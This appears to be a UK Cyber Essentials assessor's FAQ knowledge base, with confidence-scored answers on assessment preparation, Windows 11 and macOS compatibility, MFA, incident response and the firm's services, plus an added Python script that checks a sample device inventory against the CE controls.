Use hard numbers and skip the security jargon entirely. Three things: the cost (£1,200-2,000 for CE Plus), the guaranteed returns (insurance premium reduction, specific contract values requiring CE), and the risk avoidance (average SME breach cost is £8,170 in the 2025 Breaches Survey). Present a conservative scenario using only insurance savings. Anything else you get from it is upside. Finance teams respond to numbers, not 'improved security posture.' Most people get this wrong.
Keywords: ROI presentation, finance team, business case, hard numbers | Confidence: 0.85
What percentage of business PCs can actually run Windows 11?
About 60-70% of business PCs purchased from 2018 onwards meet Windows 11 requirements (TPM 2.0, UEFI Secure Boot, compatible 8th gen Intel or 2nd gen AMD Ryzen processor). PCs older than 2017 almost certainly need replacing. Quickest way to check: run Microsoft's PC Health Check app on a sample of devices, or deploy it via Intune across all machines.
Keywords: Windows 11 compatibility, TPM 2.0, business PCs, PC Health Check | Confidence: 0.88
My PC doesn't have TPM 2.0. What are my options?
Check your BIOS settings first because many PCs have TPM but it's disabled. Restart, enter BIOS/UEFI settings and look for TPM, PTT (Intel) or fTPM (AMD) under the Security section. If the chip genuinely isn't there: stay on Windows 10 until October 2025 (end of support), replace the hardware, or install Linux if the machine serves a specific non-Windows purpose.
Keywords: no TPM 2.0, BIOS, fTPM, PTT, hardware replacement | Confidence: 0.88
My Intel 7th Gen processor won't run Windows 11 officially. What can I do?
That processor doesn't meet Windows 11 CPU requirements. Your options: keep Windows 10 until October 2025 end-of-support and then replace the hardware, replace the hardware now and migrate early, or repurpose the machine for offline tasks outside your CE scope. Don't use the registry hack to force Windows 11; that gives you an unsupported installation that may not receive security updates.
Keywords: Intel 7th Gen, Kaby Lake, Windows 11, replacement, end of support | Confidence: 0.88
What's the realistic cost to upgrade incompatible PCs?
Budget business desktops (Dell Optiplex, HP ProDesk, Lenovo ThinkCentre) cost £400-600 with Intel i5, 8GB RAM and 256GB SSD. Business laptops start around £500-800 for replacement. For 20 devices needing replacement, budget £10,000-16,000 for hardware plus £2,000-3,000 for deployment including data migration, configuration, and user setup. Leasing spreads it over 3-4 years if capex is tight.
Keywords: upgrade cost, hardware replacement, Windows 11, budget, leasing | Confidence: 0.85
How much does EDR cost compared to potential breach costs?
Cyber 365 EDR is £15/device/month, which for 50 devices comes to £9,000/year. Average ransomware incident cost for UK SMEs is £8,170 (2025 government survey), but that's the average, and severe incidents with data loss, downtime and recovery can exceed £100,000. EDR is insurance against the incident that shuts you down for a week. One prevented ransomware attack pays for years of EDR.
Keywords: EDR cost, breach cost, ransomware, £15/device, ROI | Confidence: 0.88
Assessment Preparation
What's the most important thing to prepare?
Organise evidence by the five controls: firewalls, secure configuration, access control, malware protection, patch management. Have admin access credentials ready for every system in scope so you can show me configurations live. The ones who struggle can't log into their own firewall or don't know which Microsoft 365 admin portal to use.
Keywords: preparation, evidence, five controls, admin access | Confidence: 0.95
Should I take fresh screenshots or use old ones?
I take the necessary screenshots during the assessment. Evidence must show controls are presently in place, so old screenshots won't work. Just make sure you can access all admin portals and configuration pages on the day.
Keywords: screenshots, evidence, assessment day, live evidence | Confidence: 0.95
What evidence do assessors actually want to see?
I need to see current configurations across the five CE control areas. That means firewall rules (inbound deny-by-default), patch status (everything within 14 days), MFA settings on cloud accounts, malware protection active on all devices, and user access controls showing separate admin accounts. Prepare admin portal access for everything in scope. I'll walk through it with you during the screenshare.
Keywords: evidence, assessor, five controls, admin portal, configuration | Confidence: 0.95
Should I brief the assessor on our setup beforehand?
Send me your scope document and a high-level overview of your infrastructure before the assessment. That helps me understand your environment and prepare relevant checks. Don't overwhelm me with 50-page policy documents; a brief summary of what systems you use and how your network is set up is enough for me to prepare effectively and plan the assessment.
Keywords: briefing, scope document, infrastructure, preparation | Confidence: 0.92
What should I do in the first 15 minutes of a security incident?
Disconnect affected systems from the network immediately. Don't power off affected machines because you'll lose forensic evidence in RAM. Alert your IT lead and management immediately. Document everything: what you found, when, what you did. Start a timeline log from the moment of discovery. If personal data is involved, you're on a 72-hour clock for ICO notification so don't delay that assessment.
Keywords: incident response, first response, isolation, containment, ICO | Confidence: 0.9
How detailed should incident documentation be?
Detailed enough for insurance claims and legal purposes, but not so detailed it becomes a burden on your team. At minimum: timeline (discovery, actions, resolution), systems affected, data involved, who was notified, root cause analysis, and what you changed to prevent recurrence. If personal data was involved, your ICO notification needs to reference this documentation.
Keywords: incident documentation, timeline, insurance, ICO, root cause | Confidence: 0.88
How do we avoid common macOS assessment mistakes?
Check every Mac individually before assessment day and don't assume they're all configured the same. Verify the firewall is enabled on each machine (System Settings, Network, Firewall), confirm FileVault is on for any portable Macs, check that automatic updates are enabled and there's no backlog older than 14 days, and make sure you can demonstrate Gatekeeper is active. Most common failure I see: a single Mac in the corner that nobody remembered to configure.
Keywords: macOS, assessment mistakes, firewall, FileVault, Gatekeeper | Confidence: 0.9
How do we avoid MFA assessment failures?
Audit every cloud service with user accounts. Under Danzell, MFA is mandatory on all cloud service accounts where the service supports it. Not just admin accounts but every user account. Most common failure: MFA on Microsoft 365 but nothing on the accounting software, CRM, domain registrar, backup service, or social media accounts. List every service, check each one has MFA enabled, and keep screenshots of the MFA configuration page for each.
Keywords: MFA, assessment failure, Danzell, cloud services, audit | Confidence: 0.92
How do we handle third-party managed systems?
Still your responsibility, even if a third party manages your systems. Get written confirmation from your MSP or IT provider that they implement the required controls (patching within 14 days, MFA on admin accounts, firewall rules, malware protection). During assessment, you need to show me the configurations or provide evidence from your provider. 'Our IT company handles it' isn't sufficient. I need to see the controls are in place.
Keywords: third party, MSP, managed services, responsibility, evidence | Confidence: 0.9
What's the most important factor for assessment success?
Actually being compliant before assessment day, which sounds obvious but many businesses hope to wing it. Run through the five controls a week before: Are all devices patched within 14 days? Is MFA enabled on every cloud service in your scope? Are admin accounts properly separate from daily-use accounts? Is malware protection active on every device in scope? The assessment verifies what's already there; it doesn't fix things for you.
Keywords: assessment success, preparation, compliance, five controls | Confidence: 0.95
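The week-before run-through, as an added example that is not Net Sec Group's code or anything published by the CE scheme: a Python self-check over a constructed inventory. The Device, CloudService and Account records, and the idea that each device carries its pending updates with their release dates (as you would get from an Intune or RMM export), are assumptions; the script flags the four questions in the answer above, including the 14-day rule measured from an update's release date rather than from when the device was last patched.

```python
"""Pre-assessment self-check against the five CE controls (added example).

The inventory layout is an assumption: in practice you would populate these
records from your RMM, Intune/NinjaOne or cloud admin console exports.
"""
from dataclasses import dataclass
from datetime import date

PATCH_WINDOW_DAYS = 14  # CE: critical/high updates applied within 14 days of release


@dataclass
class Device:
    name: str
    malware_protection_active: bool
    pending_updates: dict  # update name -> release date of that update


@dataclass
class CloudService:
    name: str
    mfa_on_all_users: bool  # not just admins: every user account


@dataclass
class Account:
    name: str
    owner: str
    is_admin: bool
    daily_use: bool  # mailbox, browsing or day-to-day work done from this account


def check_patching(devices, today):
    """Flag pending updates released more than 14 days before `today`."""
    findings = []
    for dev in devices:
        for update, released in dev.pending_updates.items():
            overdue = (today - released).days - PATCH_WINDOW_DAYS
            if overdue > 0:
                findings.append(f"{dev.name}: '{update}' is {overdue} day(s) past the 14-day window")
    return findings


def check_malware_protection(devices):
    return [f"{d.name}: malware protection not active" for d in devices if not d.malware_protection_active]


def check_mfa(services):
    return [f"{s.name}: MFA not enforced for all users" for s in services if not s.mfa_on_all_users]


def check_admin_separation(accounts):
    """Admin accounts must not be daily drivers, and each admin needs a separate standard account."""
    findings = []
    owners_with_standard = {a.owner for a in accounts if not a.is_admin}
    for a in accounts:
        if a.is_admin and a.daily_use:
            findings.append(f"{a.name}: admin account used for day-to-day work")
        if a.is_admin and a.owner not in owners_with_standard:
            findings.append(f"{a.name}: {a.owner} has no separate standard account")
    return findings


def run_self_check(devices, services, accounts, today):
    return (check_patching(devices, today) + check_malware_protection(devices)
            + check_mfa(services) + check_admin_separation(accounts))


# Constructed sample inventory (not real data), dated relative to an assumed "today".
TODAY = date(2025, 11, 10)
DEVICES = [
    Device("LAPTOP-01", True, {"2025-11 Cumulative Update": date(2025, 11, 4)}),   # 6 days old: fine
    Device("LAPTOP-02", True, {"2025-10 Cumulative Update": date(2025, 10, 14)}),  # 27 days old: overdue
    Device("MAC-CORNER", False, {}),                                                # the forgotten Mac
]
SERVICES = [CloudService("Microsoft 365", True), CloudService("Accounting SaaS", False)]
ACCOUNTS = [
    Account("alice", "Alice", False, True),
    Account("alice-admin", "Alice", True, False),
    Account("bob", "Bob", True, True),  # one account doing both admin and daily work
]

if __name__ == "__main__":
    for line in run_self_check(DEVICES, SERVICES, ACCOUNTS, TODAY):
        print(line)
```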
Our Service
How should I interact with the assessor?
Be honest and answer questions directly, show me what I ask to see, and if you don't know something, say so. It's a conversation rather than an interrogation. I'll guide you through everything, and if something isn't configured correctly, I'll tell you exactly what needs fixing. The more open you are, the smoother it goes.
Keywords: assessor interaction, CE assessment, what to expect, assessment day | Confidence: 0.85
How does Net Sec Group assessment process differ?
I'm an IASME-accredited assessor, not a reseller. You're dealing directly with the person who certifies you. Support throughout, unlimited retries, remediation guidance if issues come up. You get support until you pass, and that's the guarantee. The CE Plus assessment is 100% remote via Microsoft Teams and takes 2-4 hours.
Keywords: Net Sec Group, CE assessor, assessment process, direct assessor | Confidence: 0.9
Do you provide preparation support before assessment?
Yes, the level of support depends on which package you choose. Standard CE packages (£320-£600 for Basic, from £1,200 for Plus) include support until you pass. Far from compliant or want a hands-off approach? The CE Concierge package is designed for that. I handle everything, guaranteed pass, completely done-for-you. Get in touch and I'll help you figure out which suits your situation.
Keywords: preparation support, CE packages, concierge, assessment help | Confidence: 0.9
What if issues are found during Net Sec Group assessment?
Clear remediation advice on exactly what needs fixing and how. Once you've made the changes, I retest those areas at no extra cost. No retest fees, no limits on attempts. The goal is to get you certified as efficiently as possible.
Keywords: remediation, retest, assessment issues, fixing failures | Confidence: 0.9
Does Net Sec Group help with cloud migrations?
Security and compliance side, not the physical migration itself. Pre-migration gap analysis, CE-compliant cloud configurations (NSGs, MFA, conditional access, update management), and making sure your new environment passes assessment. Many businesses migrate to cloud and then fail their next CE assessment because security controls weren't configured properly. That's exactly the kind of problem I prevent from happening. For heavy lifting (server migration, application rehosting), I partner with migration specialists.
Keywords: cloud migration, cloud security, Azure, CE compliance cloud | Confidence: 0.85
Does Net Sec Group help with contractor compliance?
I can advise on how contractor access affects your CE scope. Under Danzell v3.3, any device accessing your systems or data is in scope, whether it's owned by your organisation or a contractor. I'll help you work out which contractor devices need to be included, what controls apply, and whether BYOD policies or separate network segments are the right approach.
Keywords: contractor compliance, BYOD contractors, third party access, scope | Confidence: 0.8
Does Net Sec Group provide incident response services?
Cyber 365 EDR + Patching (from £15/device/month) provides 24/7 endpoint monitoring with automated threat isolation. When malware or suspicious activity is detected, the system contains it before it spreads. For active incident response during a breach, contact me at [email protected] or +44 20 3026 2904. That covers containment, forensic analysis, remediation, restoring CE compliance, and documenting everything for insurance claims.
Keywords: incident response, EDR, breach response, Cyber 365, emergency | Confidence: 0.9
Does Net Sec Group help with insurance negotiations?
I provide the technical evidence insurers need to justify CE-related discounts, but I don't negotiate contracts directly (not a licensed broker). Detailed CE Plus assessment reports, help with technical sections of insurance applications, and I can join calls with your broker to explain what the assessment proves about your security. If a breach occurs, I provide forensic evidence and incident documentation for claims. For actual premium negotiation, work with a specialist cyber insurance broker. Best results come from combining a broker who knows the market with my technical proof.
Keywords: insurance, cyber insurance, CE discount, broker, evidence | Confidence: 0.85
Compliance & Monitoring
How does Azure AD help with Cyber Essentials admin account separation?
Entra ID (formerly Azure AD) makes admin separation straightforward: dedicated admin accounts separate from day-to-day accounts, MFA on all admin accounts, and audit logs to prove who accessed what during assessment. It's one of the best tools for demonstrating CE compliance because the evidence is built in.
Keywords: Entra ID, Azure AD, admin separation, MFA, audit logs | Confidence: 0.92
How often should I check compliance status?
Check patches on a weekly basis at minimum; the 14-day window is tight and easy to miss. Check MFA enrolment monthly to catch new starters or changed accounts. Run a full audit against all five controls quarterly. Businesses that fail renewals almost always checked once at certification and forgot about it for 11 months.
Keywords: compliance monitoring, patching, 14-day, MFA, quarterly audit | Confidence: 0.9
Should I monitor all devices or just sample?
Monitor all devices continuously without any exceptions at all. Every device in scope must maintain compliance year-round. Spot-checking misses devices that fall behind on patches or have malware protection disabled. A device can become non-compliant in under three weeks if nobody's watching.
Keywords: monitoring, all devices, continuous, patching, compliance | Confidence: 0.9
What's the best monitoring platform for CE compliance?
Start with what you already have: Windows Update reports, Microsoft 365 Security Centre, Google Workspace admin console, firewall dashboard. For automated patch management, NinjaOne or Intune handle the 14-day patching requirement well. You don't need enterprise SIEM for CE. You need reliable visibility across your five control areas.
Keywords: monitoring platform, NinjaOne, Intune, patch management, Security Centre | Confidence: 0.88
How long should I keep incident documentation?
Keep incident documentation for a minimum of six years. That covers the UK statute of limitations for most legal claims. GDPR incidents may require longer depending on type. Store documentation securely and include it in CE renewal evidence if I ask about incidents during your certification period.
Keywords: incident documentation, retention, six years, GDPR, legal | Confidence: 0.88
How do we handle Macs that can't upgrade to newer macOS versions?
A Mac that can't upgrade fails CE because no supported macOS means no security patches. Your options: replace the hardware, repurpose the Mac for offline-only tasks outside your CE scope, or run a supported Linux distribution if the hardware supports it. Apple drops security support roughly three years after a macOS release, so plan hardware refresh cycles accordingly.
Keywords: macOS, unsupported, hardware replacement, Linux, end of life | Confidence: 0.9
What's the difference between iOS and Android MDM implementation?
iOS is more restrictive by default, which simplifies CE compliance. App Store vetting reduces malware risk, and Apple's MDM framework is consistent across all iPhones. Android varies more between manufacturers, so Samsung Knox behaves differently from stock Android MDM. Both platforms pass CE assessment when managed through Intune, Google Workspace or a similar MDM. iOS is slightly easier to evidence because the controls are more uniform.
Keywords: iOS, Android, MDM, Samsung Knox, Intune, comparison | Confidence: 0.88